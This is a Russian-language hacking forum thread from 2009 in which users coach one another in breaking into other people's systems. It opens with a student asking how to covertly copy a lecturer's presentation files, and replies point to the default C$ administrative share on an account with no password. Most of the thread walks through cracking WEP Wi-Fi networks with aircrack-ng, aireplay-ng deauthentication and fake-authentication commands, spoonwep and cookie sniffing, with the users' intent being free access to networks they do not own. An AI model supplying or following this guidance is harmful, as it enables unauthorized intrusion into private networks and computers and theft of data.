общем с учебой надвигается большая Ж. В общем преподаватель читает лекции по презентациям, но сами презентации не дает + иногда пропускает темы, да и время пары ограничено. сами презентации он не дает, а скачать не получается их большого веса. в общем я так понимаю что единственный шанс - это wifi. Подскажите как выкачать все *.ppt файлы с его компа по вай фаю( обязательно незаметно!!!). Имеется мой ноутбук( НР виста) и ноут преподавателя (ХР) есть возможность доступа на 3-4 минуты. и желательно не ставить никаких прог на его комп. Пожалуйста, помогите кто чем может.
общем с учебой надвигается большая Ж. В общем преподаватель читает лекции по презентациям, но сами презентации не дает + иногда пропускает темы, да и время пары ограничено. сами презентации он не дает, а скачать не получается их большого веса. в общем я так понимаю что единственный шанс - это wifi. Подскажите как выкачать все *.ppt файлы с его компа по вай фаю( обязательно незаметно!!!). Имеется мой ноутбук( НР виста) и ноут преподавателя (ХР) есть возможность доступа на 3-4 минуты. и желательно не ставить никаких прог на его комп. Пожалуйста, помогите кто чем может.
Подними одноранговую сеть и расшарь папку.
Подними одноранговую сеть и расшарь папку.
А он сможет визуально определить что у него расшарена папка?
все надо сделать незаметно
_SEREGA_
27.04.2009, 23:43
А он сможет визуально определить что у него расшарена папка?
все надо сделать незаметно
она по умолчанию расшарена!
вот наприсер конектишся к нему и пишеш в адрресной строке (в мой компутер) //его ip/c$
это диск C:
она по умолчанию расшарена!
вот наприсер конектишся к нему и пишеш в адрресной строке (в мой компутер) //его ip/c$
это диск C:
при условии что знаешь пароль администратора
при условии что знаешь пароль администратора
А если админская учетка без пароля?
_SEREGA_
29.04.2009, 00:07
А если админская учетка без пароля?
Тогда тебе не надо ничего вводить и ты попадаеш на расшареный диск.
Driver23
29.04.2009, 11:43
Античатовцы, нужна помощь. Где можно достать полную информацию о Chopchop атаке - в частности ответы на вопросы: Что за файлы он создает с расширением *.cap и *.xor, как пользоваться packetforge-ng и от куда можно достать IP-адреса атакуемых хостов (насколько я знаю это необходимо для атаки данного типа)???
_SEREGA_
29.04.2009, 21:19
Античатовцы, нужна помощь. Где можно достать полную информацию о Chopchop атаке - в частности ответы на вопросы: Что за файлы он создает с расширением *.cap и *.xor, как пользоваться packetforge-ng и от куда можно достать IP-адреса атакуемых хостов (насколько я знаю это необходимо для атаки данного типа)???
Есть инфа на офф сайте.http://www.aircrack-ng.org/doku.php
паровдо токо английская =( если не знаеш понять всё равно не трудно
я залью шас видос где используется chopchop атака, и как пользоваться packetforge-ng =) весит ~ 10 Mb. формат flv.
Так вот инфа о chopchop http://www.aircrack-ng.org/doku.php?id=korek_chopchop
и о packetforge-ng
http://www.aircrack-ng.org/doku.php?id=packetforge-ng&s[]=packet&s[]=forge
видио: http://rapidshare.com/files/227200028/KOREKCHOPCH.flv.html
Файл *.cap там все пакеты(данные) от Точки к клиенту.
файл *.xor он генерирутся от chopchop атаки.
я детально не вникал,так что знаю токо это:
знаю что chopchop расшивровывает пакеты и создаёт этот файл а с помошью packetforge-ng и этого файла создаётся пакет для генерации трафика и последующей подмены для взлома WEP.
ip адресса ставь такими 255.255.255.255
(они широковещательный) дойдут до любого.
Driver23
30.04.2009, 00:26
Данке шоныч! буду разбираться и читать. или наоборот
у меня kubuntu, поставил spoonwep2, а он не видит адаптеры. Какие-нибудь есть указания для настройки его?
апдейт:
еще вопрос. у меня wifizoo не видит куки. точки видит, а все данные (pop3,cookies,....) просто не хочет собирать.
как пробовал:
1)airodump-ng ath0 + wifizoo -i ath0
2)airodump-ng -w файл_с_дампом ath0 + wifizoo -c файл__с_дампом
есть варианты?
кто поможет как с ВТ-4 войти в итернет ?
кто поможет как с ВТ-4 войти в итернет ?
если через сетевой кабель, /etc/init.d/networking start и там должно само все определиться, если по wi-fi, то проще скачать wicd
unnamed13
04.05.2009, 19:31
не могу выставить номер канала больше 11
CRDA для смены регдомена конечно отличная идея, но есть способ проще - годен для Debian 5/Ubuntu 8.10/9.04/BT4b. Пригоден для модулей карт использующих mac80211. Для rt2500usb/ath5k/zd1211rw подойдет.
Помещаем в файл /etc/modprobe.d/wireless строку options cfg80211 ieee80211_regdom=JP - тем самым указываем что мы в Японии, а там как известно 14 b/g/n каналов. После ребута проверяем iwlist wlan0 freq , и видим
wlan0 14 channels in total; available frequencies :
Channel 01 : 2.412 GHz
Channel 02 : 2.417 GHz
Channel 03 : 2.422 GHz
Channel 04 : 2.427 GHz
Channel 05 : 2.432 GHz
Channel 06 : 2.437 GHz
Channel 07 : 2.442 GHz
Channel 08 : 2.447 GHz
Channel 09 : 2.452 GHz
Channel 10 : 2.457 GHz
Channel 11 : 2.462 GHz
Channel 12 : 2.467 GHz
Channel 13 : 2.472 GHz
Channel 14 : 2.484 GHz
Current Frequency=2.412 GHz (Channel 1)
После этого проблем с подключением к точкам на 12,13,14 каналах мы не испытываем.
Totoshka35
04.05.2009, 19:54
Добрый почти вечер всем =) Ситуация такая. Имеется - ноут с 3945АБГ адаптером. Диск СД с БТ3. При загрузке с оного диска и запуске проги WAssistant видно, что дрова для адаптера есть, то есть он находит сети и может подрубится к незащищённым. При вводе команды airmon-ng выдаёт интерфейс wlan0. При вводе команды airmon-ng start wlan0 вылезает ошибка "Neither the sysfs interface links nor the iw command is aviable. Please download and install iw from http://...." Вопросы 1) почему вылезает эта ошибка? 2) Далее скачал данный файл и что с ним делать? Это архив с несколькими файлами внутри. Я так понимаю, их нужно положить в какую-то определённую папку, но как? БТ3 грузится с сд ведь.
Ещё вопросик - 3) Адаптер асус Wl 169gE поддерживается ли для взлома вай-фай под БТ3 или виндами? Вот здесь http://www.wardrive.net/drivers/asus нашёл для него драйвер. Правда при загрузке он переадрессует на асусовскую страницу, так что соневаюсь, что этот драйвер подходит.
И ещё вопросик 4) Немного не в тему. Скачал образ БТ4, но его размер 850 мб. При попытке записать с помощью неро на сд пишет ошибку, типа мало места, что логично. =) При попытке на двд - что данный образ предназначен для сд-рв, тип диска в носителе - двд. Смените диск. Просто немного не догоняю, как его записать-то, этот образ. Подскажите, кто может.
если вопросы задавлись уже и есть ответы, дайте, пожалуйста, ссылочку, где можно посмотреть решение проблемы. Заранее спасибо
Driver23
04.05.2009, 23:30
Господа Античатовцы, и модераторы этого сайта. Мне удалось вывести разъем SMA для внешней антенны для Wi-Fi адаптера Netgear WG511T. Причем не в виде пигтейла и натурально приклеить на корпус самого адаптера. Кому интересно я уже составил фотоотчет how_to, так что объясните куда и кому скинуть и я сделаю это)))
Elvis000
05.05.2009, 01:19
Господа Античатовцы, и модераторы этого сайта. Мне удалось вывести разъем SMA для внешней антенны для Wi-Fi адаптера Netgear WG511T. Причем не в виде пигтейла и натурально приклеить на корпус самого адаптера. Кому интересно я уже составил фотоотчет how_to, так что объясните куда и кому скинуть и я сделаю это)))
https://forum.antichat.ru/thread59035.html
_SEREGA_
05.05.2009, 10:51
Добрый почти вечер всем =) Ситуация такая. Имеется - ноут с 3945АБГ адаптером. Диск СД с БТ3. При загрузке с оного диска и запуске проги WAssistant видно, что дрова для адаптера есть, то есть он находит сети и может подрубится к незащищённым. При вводе команды airmon-ng выдаёт интерфейс wlan0. При вводе команды airmon-ng start wlan0 вылезает ошибка "Neither the sysfs interface links nor the iw command is aviable. Please download and install iw from http://...." Вопросы 1) почему вылезает эта ошибка? 2) Далее скачал данный файл и что с ним делать? Это архив с несколькими файлами внутри. Я так понимаю, их нужно положить в какую-то определённую папку, но как? БТ3 грузится с сд ведь.
Ещё вопросик - 3) Адаптер асус Wl 169gE поддерживается ли для взлома вай-фай под БТ3 или виндами? Вот здесь http://www.wardrive.net/drivers/asus нашёл для него драйвер. Правда при загрузке он переадрессует на асусовскую страницу, так что соневаюсь, что этот драйвер подходит.
И ещё вопросик 4) Немного не в тему. Скачал образ БТ4, но его размер 850 мб. При попытке записать с помощью неро на сд пишет ошибку, типа мало места, что логично. =) При попытке на двд - что данный образ предназначен для сд-рв, тип диска в носителе - двд. Смените диск. Просто немного не догоняю, как его записать-то, этот образ. Подскажите, кто может.
если вопросы задавлись уже и есть ответы, дайте, пожалуйста, ссылочку, где можно посмотреть решение проблемы. Заранее спасибо
попробуй скачать прогу для винды commview for wifi
вот ссылка: http://www.tamos.com/bitrix/redirect.php?event1=download&event2=commwifi&event3=&goto=http://www.tamos.com/files/ca6.zip
bt4 beta - dvd образ. лично я без проблем записал его на dvd-r. убедись что ты скачал 'DVD Image' а не 'VMware Image'
тут сливай: http://www.remote-exploit.org/cgi-bin/fileget?version=bt4-beta-iso
Totoshka35
05.05.2009, 11:13
_SEREGA_, спасибо, что откликнулся. Коммон Вью ставил, не пашет ни на одной, ни на второй карте. В списке их тоже, собственно, нет. По поводу БТ4, скачал именно образ, не 'VMware Image', который, кстати, 1 Гб весит. Образ 850 мб. Качал с оф сайта, по той же ссылке, что и ты дал =) Аэровизард тоже, не пашет, кстати. Остаётся только БТ.
А по поводу остальных вопросов??
Да, и ещё. Где-то тут на форуме видел, что для 3945АБГ драйвера может быть два - ipw,который не поддерживает режим мониторинга и инъекций, и iwl - этот уже пропатченный и всё умет. При вводе airmon-ng выдаёт, что драйвер именно тот, который нужен. То есть всё работать должно.
Люди, у кого такой же адаптер, отзовитесь, плиз
_SEREGA_
05.05.2009, 11:22
Я щас глянул на офф сайт aircrack-ng твоя карта поддерживается linux'om.
http://www.aircrack-ng.org/doku.php?id=compatibility_drivers
на офф сайте есть ман по установке (правда токо на english)
ipw driver http://www.aircrack-ng.org/doku.php?id=ipw3945
а вот ман по iwl driver http://www.aircrack-ng.org/doku.php?id=iwl3945
особо английский знать не надо чтоб понять.
Вопросы 1) почему вылезает эта ошибка? 2) Далее скачал данный файл и что с ним делать? Это архив с несколькими файлами внутри. Я так понимаю, их нужно положить в какую-то определённую папку, но как? БТ3 грузится с сд ведь.
тебе надо собрать эту утилиту и заинсталить, aircrack ее сам найдет.
Totoshka35
05.05.2009, 12:12
razb, о, вот это уже интересней =) А поподробней как это сделать? Я линукс первый раз в виде БТ и увидел =)
Файл скачанный на флешке, флешка в ноуте, ноут под БТ3 с сд запущен. Дальнейшие мои действия какие будут??
если хочешь, давай в личке =) Можно по асе
качаешь утилиту iw по ссылке которую вывел airmon, дальше распаковываешь, собираешь и инсталируеш и будет тебе счастье.
распаковка #tar -zxvf iw.tar.gz
сборка #make
инстал #make install
Totoshka35
05.05.2009, 16:40
_SEREGA_, я уже описывал, но хорошо, повторюсь =) В БТ3 при запуске команды airmon-ng start wlan0 мне выводится следующее
"Neither the sysfs interface links nor the iw command is aviable. Please download and install iw from http://dl.aircrack-ng.org/iw.tar.bz2"
Вот по этой ссылке я и скачал архив iw.tar.bz2. теперь его походу нужно поставить, а вот как - я не знаю
Totoshka35
05.05.2009, 16:44
razb, при команде tar -zxvf iw.tar.gz пишет, что не может найти файлы, Дескать нет такой директории. Я так думаю дело в том, что БТ3 стоит на СД, а файл на флешке. И дополнительно в команде нужно указать путь к файлу. Как это сдлеать?
И ещё вопрос вдогонку - а скрины как делать в БТ3?? Чтобы мне не словесные описания вам тут давать ,а скинуть наглядные картинки?? =)
_SEREGA_
05.05.2009, 16:51
_SEREGA_, я уже описывал, но хорошо, повторюсь =) В БТ3 при запуске команды airmon-ng start wlan0 мне выводится следующее
"Neither the sysfs interface links nor the iw command is aviable. Please download and install iw from http://dl.aircrack-ng.org/iw.tar.bz2"
Вот по этой ссылке я и скачал архив iw.tar.bz2. теперь его походу нужно поставить, а вот как - я не знаю
1) создай папку на раб.столе
2) распакуй туда содержимое архива
3)открой консоль и напиши туда cd и поставь пробел
4)'перетащи на кансоль папку ту, должно быить написанно в консоле чтото типа cd 'тут путь к папке' и жми enter
6)напиши make и enter
7) напиши make install
скрины делаются также как на windows fn + print scr
ЗЫ этим гемороем ты будеш заниматься при каждом запуске backtrack
Totoshka35
05.05.2009, 17:06
_SEREGA_, мне казалось по нажатию принт скрин снимок экрана нпомещается в буфер обмена? А потом уже нужно в любом графическом редакторе кнтрл+в. Или я тебя не понял?
Ээ, а вот с каждым разом ты меня напряг.. А как избежать этого геммора??
_SEREGA_
05.05.2009, 17:12
_SEREGA_, мне казалось по нажатию принт скрин снимок экрана нпомещается в буфер обмена? А потом уже нужно в любом графическом редакторе кнтрл+в. Или я тебя не понял?
Ээ, а вот с каждым разом ты меня напряг.. А как избежать этого геммора??
в linux при нажатии принт скрин появится окно и прндложит сохранить куданить скрин.
Ты загружаешся с диска bt3,все данные идут в оперативуюю память и после выключения компа они пропадают.
'
чтобы не инсталировать каждый раз утилиту.
тебе надо установить на жёсткий диск linux. или написать скрипт чтобы утилита автоматически инсталировалась. я не профи по linuxu я не знаю,может razb знает
У меня проблема, есть адаптер вай фай asus 138g v2, и на диске идет спец софтина для неё, но при установки прожка выдает что адаптер не подключен, хотя он подключен и система его видит, когда была система x86 была все норм, щяс х64 и такое. Может есть какая-нибудь альтернативная программа для создания вай фай точки доступа
Totoshka35
05.05.2009, 21:22
_SEREGA_, сделал как ты сказал. Двумя способами. Создал паппку на рабочем столе, туда кинул сам архив. Второй раз открыл архив как простую папку, и скопировал все файлы оттуда в директорию на рабочем столе. Результат - ошибка как в первом так и во втором случае.
bt ` # cd '/root/Desktop/New Folder'
bt New Folder # make
make: *** No targets specified and no makefile found. Stop.
bt New Folder # cd '/root/Desktop/New Folder'
bt New Folder # make
CC iw.o
iw.c:11:31: error: netlink/genl/genl.h: No such file or directory
iw.c:12:33: error: netlink/genl/family.h: No such file or directory
iw.c:13:33: error: netlink/genl/ctrl.h: No such file or directory
iw.c:14:25: error: netlink/msg.h: No such file or directory
iw.c:15:26: error: netlink/attr.h: No such file or directory
iw.c: In function 'nl80211_init':
iw.c:25: error: implicit declaration of function 'nl_handle_alloc'
iw.c:25: warning: assignment makes pointer from integer without a cast
iw.c:31: error: implicit declaration of function 'genl_connect'
iw.c:37: error: implicit declaration of function 'genl_ctrl_alloc_cache'
iw.c:37: warning: assignment makes pointer from integer without a cast
iw.c:44: error: implicit declaration of function 'genl_ctrl_search_by_name'
iw.c:44: warning: assignment makes pointer from integer without a cast
iw.c:54: error: implicit declaration of function 'nl_cache_free'
iw.c:56: error: implicit declaration of function 'nl_handle_destroy'
iw.c: In function 'nl80211_cleanup':
iw.c:62: error: implicit declaration of function 'genl_family_put'
make: *** [iw.o] Error 1
bt New Folder #
Что я делаю не так??
Totoshka35 из логов очевидно, что компиляции не были обнаружены соответствующие библиотеки разработчика. Возможно лучше будет make сделать не на livecd , а на полноценном gnu/linux, а потом уже запускать его из bt .
Totoshka35
06.05.2009, 01:10
Alexus, я в линуксах совсем не шарю. Можно подробно и по шагам как это сделать??
Люди с Intel Pro/Wireless 3945 ABG, отзовитесь!! Какие дрова вы используете?? iwl3945 или ipw3945. Просто в соседней теме нашёл, что рабочие вторые. На офф сайте айркряка написано, что первые. Я в замешательстве честно говоря...
стоит Intel Pro/Wireless 3945 ABG, работает прекрасно с iwl3945, для сборки iw нужна библиотека libnl, тебе прийдется сначала собрать ее.
з.ы. забей пока на вардрайвинг и изучай ось, тут уже и так все подробно расписали.
Totoshka35
06.05.2009, 14:14
razb, где взять данную библиотеку?? Как собрать?
У тебя она работает с БТ3?? Ты дополнительно что-то делал, я правильно понимаю? То есть просто с БТ3 этот адаптер работать не будет?
Опять та же тема - качайте бт4. Там все уже поправлено, закомпилено, и положено на блюдечко с золотой каёмочкой. Вам так хочеться возиться - валяйте.
На бт4 у меня используються iwl3945, и все без каких-либо проблем. Такие вот дела.
Totoshka35
06.05.2009, 15:51
Записал-таки БТ4 на болванку на другом диске. Всё заработало =) Но, пакетов ловится чуть-чуть. Хочу попробовать расшевелить точку с помощью aireplay-ng . Возник вопрос - как открыть ещё одну консольную сессию?? В БТ4 графического интерфейса аля Винды как в БТ3 нету. Поэтому и спрашиваю.
Ещё вопросик - при ловле пакетов в списке клиентов есть графа Probe и там что-то написано. ЧТо это?? Имя компа коиента или что?
Записал-таки БТ4 на болванку на другом диске. Всё заработало =) Но, пакетов ловится чуть-чуть. Хочу попробовать расшевелить точку с помощью aireplay-ng . Возник вопрос - как открыть ещё одну консольную сессию?? В БТ4 графического интерфейса аля Винды как в БТ3 нету. Поэтому и спрашиваю.
1) для консоля alt+left arrow or right arrow
2) там есть кеды, если бы ты внимательно читал что написано на экране вопросов бы не возникало,
#startx
Totoshka35
06.05.2009, 17:01
razb, спасибо за подсказку =) Команду такую знал, но думал тут она не пашет почему-то.
Итак, комрады, такой вопрос. Запускаю airmon-ng, переключаю в режим мониторинга, заисываю МАС Ар и клиента, БССИД, запускаю airodup-ng, начинаю ловлю пакетов. Параллельно запускаю aireplay-ng, делаю инъекции, то есть заставляю точку быть поактивней. Всё гуд, всё работает как надо, ошибок нет. Открываю третью вкладку с консолью, запускаю aircrack и вот тут меня поджидает ошибка. ПРи чём тупая. Но как с ней броться, я хочу спросить совета у вас =) Ниже список моих команд.
airmon-ng
airmon-ng start wlan0
Ctrl+C
airodump-ng wlan0
airodump-ng --ivs -w dump --band g --channel 1 wlan0
2-ая вкладка
aireplay-ng -e xxx -a 00:0d:88:5633:b5 -c 00:0f:ea:91:7d:95 --deauth 20 wlan0
3-я вкладка
aircrack-ng -a 1 -e xxx -b 00:0d:88:5633:b5 -c 00:0f:ea:91:7d:95 -n 128 dump.ivs
и получаю
open: 00:0f:ea:91:7d:95
ope failed: No such file or directory
У кого какие мысли?? Мне так думается, что при -w dump файл с векторами инициализации сохраняется на рабочем столе, а я запускаюсь с сд и потому он не может записать его. Видимо нужно написать так, чтобы он писал файл допустим, на флешку. Кто может подсказать, как в этом случае будет выглядеть эта команда, и aircrack-ng??
_SEREGA_
06.05.2009, 17:15
aircrack-ng -a 1 *.ivs
или
aircrack-ng -a 1 -n 128 *.ivs
вот и всё
PS он не раб стол пишет дамп, а помоему в root или home. там на раб стале значки. открой внурти файлы должны быть и ты их на флэшку копируеш
Totoshka35
06.05.2009, 17:22
_SEREGA_, сдаётся мне, что при таком листинге просто будут искаться и использоваться ЛЮБЫЕ файлы с таким расширением в главной директории.. Записать в которую airodump-ng не может, так как она на сд находится.
Сейчас проверил - так и есть - не пашет =)
Попытаюсь поподробней обяъснить чего я хочу. Я хочу airodump-ng-ом записывать файл с векторами на флешку. И потом айркряком его оттуда же читать. Потому два вопроса - как будет выглядеть путь для записываемого и читаемого файла в этих двух прогах?
_SEREGA_
06.05.2009, 17:28
_SEREGA_, сдаётся мне, что при таком листинге просто будут искаться и использоваться ЛЮБЫЕ файлы с таким расширением в главной директории.. Записать в которую airodump-ng не может, так как она на сд находится.
да он найдёт все файл ivs, который airdump туду записал! ОНИ ЗАПИСЫВАЮТСЯ НЕ НА СД А В ОПЕРАТИВУ И ВСЕ ТЕ ПАПКИ В ГЛАВНОЙ ДИРЕКТОРИИ ОНИ В ОПЕРАТИВЕ А НЕ НА СД.и ты их можеш скопировать на флэшку от туда потом.
Я вот 20 мин назад ломал WEP аирдамп запускал так
airodump-ng wlan0 --bssid blablalba -i -w capture -c 1
а потом аиркряк запускай как написал я выше
Totoshka35
06.05.2009, 17:35
_SEREGA_, спасибо за разъяснения =) Не знал, что пишется в оперативу. Пойду разбираться тогда, где сплоховал =)
Totoshka35
07.05.2009, 12:25
Такой вопрос - а если у АР нет клиентоа?? Ну, или по крайней мере айродамп его не видит, и соответсвенно, я не знаю его МАС-адрес. Как в этом случае нужно проводить инъекции??
У меня проблема, есть адаптер вай фай asus 138g v2, и на диске идет спец софтина для неё, но при установки прожка выдает что адаптер не подключен, хотя он подключен и система его видит, когда была система x86 была все норм, щяс х64 и такое. Может есть какая-нибудь альтернативная программа для создания вай фай точки доступа
Без ответа :\
Такой вопрос - а если у АР нет клиентоа?? Ну, или по крайней мере айродамп его не видит, и соответсвенно, я не знаю его МАС-адрес. Как в этом случае нужно проводить инъекции??
Там читай все
_http://thew0rd.com/2008/08/19/tutorial-cracking-wep-using-backtrack-3/
На форуме есть мануал по крякингу веп (кря).
Если клиентов нет, то нужно подключиться фейково к точке, и выполнить команду
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [bssid] -h 00:11:22:33:44:66 [device]
Totoshka35
08.05.2009, 00:34
Не пашет эта команда, я пробовал. Айродамп просто пишет типа прочитано столько-то пакетов, а айркряк говорит, что файл пустой, нет дата пакетов для выбранной сети.
Totoshka35
08.05.2009, 16:30
Вопрос с отсутствием клиента временно отпал. Зато возник другой. Итак. Вижу нужную сеть. Она находится на 1 канале. Айродамп запускаю с параметрами -ivs и -channel 1. НО, когда запускаю айрплай и ввожу
aireplay-ng -e XXX -a xx:xx:xx:xx:xx:xx -c yy:yy:yy:yy:yy:yy --deauth 20 wlan0
Мне вылезает следующее
Waiting for beacon frame (BSSID xx:xx:xx:xx:xx:xx) on channel 8.
wlan0 is on channel 8, but the AP uses channel 1.
Причём, при следующем запуске этой же команды вылезает это же сообщение, но говорящее, что интерфейс работает уже не на 8, а на 7 канале. Итак каждый раз новый канал. Причём иногда попадает так, что срабатывает команда и посылаются запросы. В чём прикол??
И второй вопрос - по показаниям айродампа накоплено около 100 000 пакетов. Напомню, айродамп запускался с установкой записывать только пакеты с вектором инициализации. А при запуске айркряка тот недолго думает и говорит, что не могу найти пароль, следующая попытка при 5000 ивс пакетов. И наверху в счётчике пишет, прочитано 393 пакета. Это как?? Мне казалось айродамп показывает именно количество ивс пакетов, а не пактов вообще. Получается, чтобы накопить нужное для взлома количество пакетов это нужно вообще дофига времени. И это с использованием айроплай!! Где моя ошибка? И есть ли она вообще?
Добрый день! Поздравляю Всех с праздником ДНЁМ ПОБЕДЫ!!!!
Я здесь впервые и мне нужна помощь! Купил себе PC WI-FI адаптер ZyXEL G-302 EE, посмотрел в списке своей карты не увидел! Кто может подсказать, какой софт нужен для моей карты чтоб взламывать wi-fi точки? Или с моей картой это не возможно?Спасибо.
реально ли настроить адаптер на fm-частоты?
имеется ввиду железная, а не программная возможность
Возможен ли вообще wardriving на DWL-2100ap?
user_bad
13.05.2009, 20:07
Добрый день! Поздравляю Всех с праздником ДНЁМ ПОБЕДЫ!!!!
Я здесь впервые и мне нужна помощь! Купил себе PC WI-FI адаптер ZyXEL G-302 EE, посмотрел в списке своей карты не увидел! Кто может подсказать, какой софт нужен для моей карты чтоб взламывать wi-fi точки? Или с моей картой это не возможно?Спасибо.
так посмотри какой чип стоит, а там видно будет
Добрый вечер. Вообщем мучался, мучялся со своим WI-FI адаптером ZyXEL G-302 EE в течении недели потом пошол в магазин и обменял её на D-Link DWA-520 и у меня все проги которые не хотели работать раньше заработали! Собрал значит я с одной точки доступа дата пакетов 300 тыс. через прогу CommView for WiFi, упаковал в файл " .CAP ", загнал в Aircrack-ng GUI, перепробовал все настройки изменять но так почемуто и не смог получить ключ! шифрование у точки WEP. потом тоже самое уже сделал с 700 тыс. пакетов, Aircrack пишет " Failed. Next try with 150000 IVs." ! может я чтото не так делаю? Подскажите пожалуйста что можно сделать? А то ой как хочется на скорости 54м/с полетать! Да, забыл добавить, что точка доступа скрытая!Заранее очень благодарен
Добрый вечер. Вообщем мучался, мучялся со своим WI-FI адаптером ZyXEL G-302 EE в течении недели потом пошол в магазин и обменял её на D-Link DWA-520 и у меня все проги которые не хотели работать раньше заработали! Собрал значит я с одной точки доступа дата пакетов 300 тыс. через прогу CommView for WiFi, упаковал в файл " .CAP ", загнал в Aircrack-ng GUI, перепробовал все настройки изменять но так почемуто и не смог получить ключ! шифрование у точки WEP. потом тоже самое уже сделал с 700 тыс. пакетов, Aircrack пишет " Failed. Next try with 150000 IVs." ! может я чтото не так делаю? Подскажите пожалуйста что можно сделать? А то ой как хочется на скорости 54м/с полетать! Да, забыл добавить, что точка доступа скрытая!Заранее очень благодарен
скачай себе BACK/TRACK-3 вот ссылка##
http://torrents.ru/forum/viewtopic.php?t=1380189
http://torrents.ru/forum/viewtopic.php?t=983009
залей на USB через эту прогу # UNetbootin 3.23
вот ссылка где скачать ## http://pochta-mechty.ru/softland/?p=3576 и есть описание заливки образа ISO на USB .
по этой ссылке скачай ## http://neovortex.kodings.googlepages.com/spoonwep2.lzm
http://shamanvirtuel.googlepages.com/SWPA.lzm
и на второе USB скопируй spoonwep2 ,spoonwpa .
далее - запустить БТ3 (если это еще не сделано).
После входа в систему - запустить терминал, набрать команды:
bt# /usr/bin/lzm2dir <полный путь к файлу>/spoonwep2.lzm /
и
bt# /usr/bin/lzm2dir <полный путь к файлу>/SWPA.lzm /
например, я скопировал файлы на флэшку, она у меня примонтирована как sdb1. Соответственно, "мои
команды"-
bt# /usr/bin/lzm2dir /mnt/sdb1/spoonwep2.lzm /
и
bt# /usr/bin/lzm2dir /mnt/sdb1/SWPA.lzm /
после чего можно залезать в меню K/backtrack/Radio Network Analysis/80211/All или
K/backtrack/Radio Network Analysis/80211/Crack и запускать SpoonWEP2 или SpoonWPA - смотря что
нужно. Для любителей - запуск из терминала:
bt# /usr/bin/spoonwep~
bt# /usr/bin/spoonwpa
по этой ссылке смотри видео ## http://blip.tv/file/1108519/
Semby68
Спасибо большое! Буду пробовать,но можете подсказать мне получаеться нужно загружатся с usb? а если не получится с usb загрузится? с диска может попробывать,там всё тоже нужно делать?
Semby68
Спасибо большое! Буду пробовать,но можете подсказать мне получаеться нужно загружатся с usb? а если не получится с usb загрузится? с диска может попробывать,там всё тоже нужно делать?
всё тоже самоe! только ВТ залей на SD .
удачи !
вышел и ВТ-4 , но под него они не идут !
да и карту не забудь перевести в режим мониторинга!
Для начала переводим карту в режим "monitor mode" :
root@bt:~# airmon-ng
Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0)
ath1 Atheros madwifi-ng VAP (parent: wifi0)
wlan0 Ralink 2573 USB rt73usb - [phy0]
root@bt:~# airmon-ng start wlan0
Interface Chipset Driver
wifi0 Atheros madwifi-ng
(monitor mode enabled on mon0)
удачи !
Semby68
Спасибо тебе огромное!!! Только не могу найти описание заливки образа ISO на USB, там где программа лежит я не нашол описания! Можешь помоч? Просто у меня спутниковый интернет с небольшой скоростью и если я начну качать образ для CD это займёт немало времени!А для USB я сегодня на работе скачал хотя там лимит и вышло на девятьсот с чемто рублей,так что понаглеть нельзя сильно наглядно будет!
Semby68
Получилось залить на USB!!! И даже загрузился с флешки! Но есть одно но при загрузке БТ3 просит ввести какойто Login и Password! Что это может быть? И далее я не понял где мне прописывать путь к spoonwep2.lzm,SWPA.lzm их что тоже нужно на другую флешку скинуть и вставить когда загрузится БТ3? Извени если я всё переспрашиваю, потому как я только начинающий (чайник) и мне пока многое не понятно!!! и ещё, ты там написал что надо перевести карту в режим мониторинга, можно поподробнее, ато я не пойму где находятся все настройки!Просто у меня прога CommView for WiFi сама установила свои дрова для перевода в режим мониторинга, а здесь я не пойму как!?
t_serega
16.05.2009, 09:15
Прошу совета по настройке Orient XG-701A+ под Ubuntu 9.04 на Asus EEE PC 1000H
Ставлю дополнительным WiFi-адаптером, т.к. цепляю внешнюю антенну D-Link ANT24-0600.
На нетбуке стоит десктопная версия Ubuntu 9.04
Пересобирал ядро через Array.org на 2.6.28-12-netbook-eeepc
Из-за этого, думаю, система не видит модуля zd1211rw для чипсета ZD1211
Подскажите как по новой интегрировать zd1211rw в ядро (подробно по шагам :-) )?
а можно пару вопросиков! как на вт3 установить tkiptun-ng? и еще как можно проверить подключение после сбора data пакетов и получение ключа. из консоли? а то постоянно нужно перегружаться чтоб wifi заработал на подключение! зарание спасибо!!!
Semby68
Получилось залить на USB!!! И даже загрузился с флешки! Но есть одно но при загрузке БТ3 просит ввести какойто Login и Password! Что это может быть? И далее я не понял где мне прописывать путь к spoonwep2.lzm,SWPA.lzm их что тоже нужно на другую флешку скинуть и вставить когда загрузится БТ3? Извени если я всё переспрашиваю, потому как я только начинающий (чайник) и мне пока многое не понятно!!! и ещё, ты там написал что надо перевести карту в режим мониторинга, можно поподробнее, ато я не пойму где находятся все настройки!Просто у меня прога CommView for WiFi сама установила свои дрова для перевода в режим мониторинга, а здесь я не пойму как!?
Это в ВТ-4 надо прописывать Login и Password, но в ВТ-4 эти проги не будут рулить!! Ну а если просит Login #root
Password # toor
#startx
spoonwep2.lzm,SWPA.lzm закинь на другое USB,
и вставь его после загрузки ВТ
откроешь консоль ком.строки и пишешь
airmon-ng
Отобразиться список всех доступных WiFi адаптеров.
выберешь тот который будешь
использовать
у меня < mon0 >
После набери
airmon-ng start {имя адаптера}
http://benjy-blog.blogspot.com/2008/07/spoonwep2-prsentation.html
http://neovortex.kodings.googlepages.com/spoonwep2vid.htm
Это в ВТ-4 надо прописывать Login и Password, но в ВТ-4 эти проги не будут рулить!! Ну а если просит Login #root
Password # toor
#startx
spoonwep2.lzm,SWPA.lzm закинь на другое USB,
и вставь его после загрузки ВТ
откроешь консоль ком.строки и пишешь
airmon-ng
Отобразиться список всех доступных WiFi адаптеров.
выберешь тот который будешь
использовать
у меня < mon0 >
После набери
airmon-ng start {имя адаптера}
http://benjy-blog.blogspot.com/2008/07/spoonwep2-prsentation.html
http://neovortex.kodings.googlepages.com/spoonwep2vid.htm
ещё ссылка
http://www.metacafe.com/watch/1720626//
ещё ссылка
http://www.metacafe.com/watch/1720626//
http://zrfree.com/2009/02/simply-crack-wireless-passwords-with-bt3.html
что-то не получается запустить WI-fi в ВТ-4 ,может кто знает как ? заранее благодарю !
не вижу сетей чтоб подключится.
Semby68
